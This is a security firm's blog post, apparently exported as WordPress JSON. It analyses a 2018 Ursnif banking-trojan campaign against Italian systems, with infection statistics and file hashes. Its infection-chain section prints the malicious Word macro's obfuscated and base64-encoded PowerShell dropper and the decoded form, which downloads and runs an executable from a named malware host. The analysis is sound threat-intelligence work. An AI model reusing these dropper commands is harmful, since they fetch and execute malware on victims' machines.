{"id":349,"date":"2018-11-26T09:00:39","date_gmt":"2018-11-26T07:00:39","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=349"},"modified":"2026-06-08T22:45:14","modified_gmt":"2026-06-08T22:45:14","slug":"ursnif-attacks-italy","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/emerging-threats\/ursnif-attacks-italy\/","title":{"rendered":"Ursnif \u2014 attacks in Italy"},"content":{"rendered":"<p style=\"text-align: justify\"><strong>Ursnif<\/strong> is a Banking Trojan malware designed to maintain system access and steal user credentials through keylogging functionality.<\/p>\n<p style=\"text-align: justify\">The campaign identified and analysed represents the second wave of Ursnif attacks in November (YER, root folder of the distribution system). We tracked <strong>775 Italian systems<\/strong> compromised, representing <strong>46%<\/strong> of the total:<\/p>\n<figure id=\"attachment_423\" aria-describedby=\"caption-attachment-423\" style=\"width: 631px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" width=\"641\" height=\"294\" class=\"wp-image-423 size-full\" alt=\"Ursnif infections\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/11\/Ursnif-infections.png\" loading=\"lazy\"><figcaption id=\"caption-attachment-423\" class=\"wp-caption-text\">Ursnif infections<\/figcaption><\/figure>\n<h2>Infections Italy and Worldwide<\/h2>\n<p style=\"text-align: justify\">Our research and analysis operations enabled us to obtain further details regarding systems compromised by Ursnif malware. The following represents the distribution of infections globally. 
Particularly noteworthy is that <strong>Italy represents a significant target<\/strong> for the criminal group deploying Ursnif malware.<\/p>\n<figure id=\"attachment_434\" aria-describedby=\"caption-attachment-434\" style=\"width: 682px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" width=\"692\" height=\"257\" class=\"wp-image-434 size-full\" alt=\"Ursnif - Attack Map\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/11\/infezioni-ursnif.png\" loading=\"lazy\"><figcaption id=\"caption-attachment-434\" class=\"wp-caption-text\">Ursnif &#8211; Attack Map<\/figcaption><\/figure>\n<p>Distribution of infections in Italy highlighting the most affected provinces.<\/p>\n<figure id=\"attachment_449\" aria-describedby=\"caption-attachment-449\" style=\"width: 560px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" width=\"570\" height=\"322\" class=\"size-full wp-image-449\" alt=\"Ursnif Italia\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/11\/Ursnif-Italia.png\" loading=\"lazy\"><figcaption id=\"caption-attachment-449\" class=\"wp-caption-text\">Ursnif Italia<\/figcaption><\/figure>\n<p style=\"text-align: justify\">The following images display details of Italian compromises. On the right image, the list of <strong>Internet Service Providers<\/strong> to which the devices with the highest number of infections are connected. 
On the left image, the list of primary IP addresses of <strong>compromised systems<\/strong>.<\/p>\n<figure id=\"attachment_452\" aria-describedby=\"caption-attachment-452\" style=\"width: 318px\" class=\"wp-caption alignright\"><img decoding=\"async\" width=\"328\" height=\"280\" class=\"size-full wp-image-452\" alt=\"Ursnif - ISP Infected\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/11\/ISP-Infected.png\" loading=\"lazy\"><figcaption id=\"caption-attachment-452\" class=\"wp-caption-text\">Ursnif &#8211; ISP Infected<\/figcaption><\/figure>\n<figure id=\"attachment_465\" aria-describedby=\"caption-attachment-465\" style=\"width: 213px\" class=\"wp-caption alignleft\"><img decoding=\"async\" width=\"223\" height=\"183\" class=\"wp-image-465 size-full\" alt=\"Compromissione sistemi aziendali\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/11\/aziende.png\" title=\"Compromissione sistemi aziendali\" loading=\"lazy\"><figcaption id=\"caption-attachment-465\" class=\"wp-caption-text\">Compromise of corporate systems<\/figcaption><\/figure>\n<h2 style=\"text-align: justify\">The Infection Process<\/h2>\n<p style=\"text-align: justify\">The system infection chain is now well-established: malicious emails carrying Office suite documents, in this case <strong>Word<\/strong>, either as attachments or as downloadable links. 
The malicious document contains a Macro that, if enabled, executes a series of system commands for compromise.<\/p>\n<figure id=\"attachment_354\" aria-describedby=\"caption-attachment-354\" style=\"width: 707px\" class=\"wp-caption aligncenter\"><img decoding=\"async\" width=\"717\" height=\"462\" class=\"wp-image-354 size-full\" alt=\"Ursnif Word\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2018\/11\/Ursnif-Word.png\" loading=\"lazy\"><figcaption id=\"caption-attachment-354\" class=\"wp-caption-text\">Ursnif Word<\/figcaption><\/figure>\n<h4 style=\"text-align: justify\">Executed Commands<\/h4>\n<p style=\"text-align: justify\">The Word document does not contain the malware but acts as a <em>downloader.<\/em> It handles download and execution of the malware:<\/p>\n<h6 style=\"text-align: justify\"><strong>Step 1<\/strong> (obfuscated <em>cmd<\/em> command):<\/h6>\n<blockquote><p><span style=\"color: #000080;font-size: 10pt\">cMd.EXE \/c p^o^W^e^r^S^h^e^l^L^.^e^x^e^ ^-^e^c^ ^K^A^B^O^A^G^U^A^d^w^A^t^A^E^8^A^Y^g^B^q^A^G^U^A^Y^w^B^0^A^C^A^A^U^w^B^5^A^H^M^A^d^A^B^l^A^G^0^A^L^g^B^O^A^G^U^A^d^A^A^u^A^F^c^A^Z^Q^B^i^A^E^M^A^b^A^B^p^A^G^U^A^b^g^B^0^A^C^k^A^L^g^B^E^A^G^8^A^d^w^B^u^A^G^w^A^b^w^B^h^A^G^Q^A^R^g^B^p^A^G^w^A^Z^Q^A^o^A^C^I^A^a^A^B^0^A^H^Q^A^c^A^A^6^A^C^8^A^L^w^B^u^A^G^k^A^b^g^B^h^A^H^M^A^d^Q^B^r^A^G^E^A^c^w^B^o^A^C^4^A^Y^w^B^v^A^G^0^A^L^w^B^Z^A^E^U^A^U^g^A^v^A^H^A^A^Z^Q^B^s^A^G^k^A^b^Q^A^u^A^H^A^A^a^A^B^w^A^D^8^A^b^A^A^9^A^H^U^A^b^A^B^v^A^G^Y^A^M^g^A^u^A^H^c^A^b^w^B^z^A^C^I^A^L^A^A^g^A^C^Q^A^Z^Q^B^u^A^H^Y^A^O^g^B^B^A^F^A^A^U^A^B^E^A^E^E^A^V^A^B^B^A^C^A^A^K^w^A^g^A^C^c^A^X^A^A^3^A^D^g^A^M^w^A^2^A^D^A^A^M^Q^B^l^A^D^g^A^L^g^B^l^A^H^g^A^Z^Q^A^n^A^C^k^A^O^w^B^T^A^H^Q^A^Y^Q^B^y^A^H^Q^A^L^Q^B^Q^A^H^I^A^b^w^B^j^A^G^U^A^c^w^B^z^A^C^A^A^J^A^B^l^A^G^4^A^d^g^A^6^A^E^E^A^U^A^B^Q^A^E^Q^A^Q^Q^B^U^A^E^E^A^J^w^B^c^A^D^c^A^O^A^A^z^A^D^Y^A^M^A^A^x^A^G^U^A^O^A^A^u^A^G^U^A^e^A^B^l^A^C^c^A^O^w^A^g^A^E^U^A^e^A^B^p^A^H^Q^A<\/span><\/p><\/blockquote>\n<h6 
style=\"text-align: justify\"><strong>Step 2<\/strong> (<em>Powershell<\/em> command):<\/h6>\n<blockquote><p><span style=\"color: #000080;font-size: 10pt\">cMd.EXE \/c poWerShelL.exe -ec KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwBuAGkAbgBhAHMAdQBrAGEAcwBoAC4AYwBvAG0ALwBZAEUAUgAvAHAAZQBsAGkAbQAuAHAAaABwAD8AbAA9AHUAbABvAGYAMgAuAHcAbwBzACIALAAgACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACAAKwAgACcAXAA3ADgAMwA2ADAAMQBlADgALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAJwBcADcAOAAzADYAMAAxAGUAOAAuAGUAeABlACcAOwAgAEUAeABpAHQA<\/span><\/p><\/blockquote>\n<h6 style=\"text-align: justify\"><strong>Step 3<\/strong> (Base64 command decoding):<\/h6>\n<blockquote><p><span style=\"color: #000080;font-size: 10pt\">(New-Object System Net WebClient) DownloadFile(&#8220;http:\/\/ninasukash com\/YER\/pelim php?l=ulof2 wos&#8221;, $env:APPDATA + &#8216;\\783601e8 exe&#8217;);Start-Process $env:APPDATA&#8217;\\783601e8 exe&#8217;; Exit<\/span><\/p><\/blockquote>\n<h2 style=\"text-align: justify\">The URSNIF Malware<\/h2>\n<p style=\"text-align: justify\">The extracted Powershell command proceeds to download the Ursnif malware from the internet site <strong>ninasukash[.]com<\/strong>. 
Our <a href=\"https:\/\/fortgale.com\/en\/cyber-threat-intelligence\/\">Cyber Threat Intelligence<\/a> operations have identified this infrastructure as a persistent distribution vector for this Banking Trojan family. The download is performed by the fragment:<\/p>\n<blockquote>\n<p style=\"text-align: justify\"><span style=\"font-size: 10pt\">{ DownloadFile(\"http:\/\/ninasukash[.]com\/YER\/pelim.php?l=ulof2.wos\", $env:APPDATA + '\\783601e8.exe'); }<\/span><\/p>\n<\/blockquote>\n<p style=\"text-align: justify\">and the downloaded file is then immediately executed by the command portion:<\/p>\n<blockquote>\n<p style=\"text-align: justify\"><span style=\"font-size: 10pt\">{ Start-Process $env:APPDATA'\\783601e8.exe' }<\/span><\/p>\n<\/blockquote>\n<table style=\"border-collapse: collapse;width: 100%;height: 145px\" border=\"1\">\n<tbody>\n<tr style=\"height: 29px\">\n<td style=\"width: 50%;background-color: #22247a;height: 29px\"><span style=\"color: #ffffff;, courier, monospace;font-size: 10pt\"><strong>Info<\/strong><\/span><\/td>\n<td style=\"width: 50%;background-color: #22247a;height: 29px\"><span style=\"color: #ffffff;, courier, monospace;font-size: 10pt\"><strong>Value<\/strong><\/span><\/td>\n<\/tr>\n<tr style=\"height: 29px\">\n<td style=\"width: 50%;height: 29px\">\n<div class=\"enum\"><span style=\", courier, monospace;font-size: 10pt\"><strong><span class=\"field-key\">MD5<\/span><\/strong><\/span><\/div>\n<\/td>\n<td style=\"width: 50%;height: 29px;text-align: center\"><span style=\", courier, monospace;font-size: 10pt\">ab33b0f6560c16133339182b8c5030ce<\/span><\/td>\n<\/tr>\n<tr style=\"height: 29px\">\n<td style=\"width: 50%;height: 29px\"><span style=\", courier, monospace;font-size: 10pt\"><strong><span class=\"field-key\">SHA1<\/span><\/strong><\/span><\/td>\n<td style=\"width: 50%;height: 29px;text-align: center\"><span style=\", courier, monospace;font-size: 10pt\">261cb3e5595f4cca5a0c0a12006288e48a8f6d1e<\/span><\/td>\n<\/tr>\n<tr style=\"height: 29px\">\n<td style=\"width: 
50%;height: 29px\"><span class=\"field-key\" style=\", courier, monospace;font-size: 10pt\"><strong>SHA256<\/strong><br \/>\n<\/span><\/td>\n<td style=\"width: 50%;height: 29px;text-align: center\"><span style=\", courier, monospace;font-size: 10pt\">0ce4392261f6d8d0a2fa666b649860716527f41ea90de948fb03affed69a50ac<\/span><\/td>\n<\/tr>\n<tr style=\"height: 29px\">\n<td style=\"width: 50%;height: 29px\"><span style=\", courier, monospace;font-size: 10pt\"><strong>VirusTotal<\/strong><\/span><\/td>\n<td style=\"width: 50%;height: 29px;text-align: center\"><span style=\", courier, monospace;font-size: 10pt\"><a href=\"https:\/\/www.virustotal.com\/en\/file\/0ce4392261f6d8d0a2fa666b649860716527f41ea90de948fb03affed69a50ac\/analysis\/\">VirusTotal Link<\/a><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: justify\">Further technical details are available in the second part of this analysis. The infection chain observed\u2014macro-enabled Office documents, obfuscated command execution, and multi-stage payload delivery\u2014remains a persistent attack vector requiring endpoint detection and response capabilities to identify and contain Banking Trojan infections at scale.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ursnif campaigns aimed at Italian organisations: phishing lures in Italian, payload delivery patterns and C2 hosting trends observed across multiple 
waves.<\/p>\n","protected":false},"author":1,"featured_media":449,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[3202,435,178,179,188,3144,212,213,3201,337,362,368,374],"class_list":["post-349","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-emerging-threats","tag-banking-trojan-campaigns","tag-fortgale-report","tag-infection","tag-infections","tag-italia","tag-italian-threat-landscape","tag-malware","tag-malware-analysis","tag-phishing-italy","tag-statistics","tag-trojan","tag-ursnif","tag-virus"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/349","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=349"}],"version-history":[{"count":2,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/349\/revisions"}],"predecessor-version":[{"id":9868,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/349\/revisions\/9868"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=349"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=349"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=349"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}